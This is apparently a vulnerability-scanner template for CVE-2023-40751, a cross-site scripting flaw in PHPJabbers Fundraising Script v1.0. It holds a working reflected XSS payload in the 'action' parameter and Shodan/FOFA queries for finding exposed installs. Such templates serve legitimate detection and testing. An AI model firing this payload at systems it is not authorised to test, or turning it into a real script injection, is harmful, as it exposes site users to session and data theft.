id: CVE-2023-40751

info:
  name: PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    PHPJabbers Fundraising Script v1.0 is vulnerable to Cross Site Scripting (XSS) via the "action" parameter of index.php.
  reference:
    - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40751
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-40751
    cwe-id: CWE-79
    cpe: cpe:2.3:a:phpjabbers:fundraising_script:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"PHPJabbers"
    fofa-query: body="PHPJabbers"
    vendor: phpjabbers
    product: fundraising_script
  tags: cve,cve2023,phpjabbers,fundraising,xss

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=prompt(document.domain)>"
          - "didn't exists"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204d71b7e4e8879b5f16523f26e4ebc3fc15dc89333fc3c94d56cf863ff619701b022100bb05e211ece65578c0f978b2da039b1972694a2bb8533bb035f7fe1aa6ee065d:922c64590222798bb761d5b6d8e72950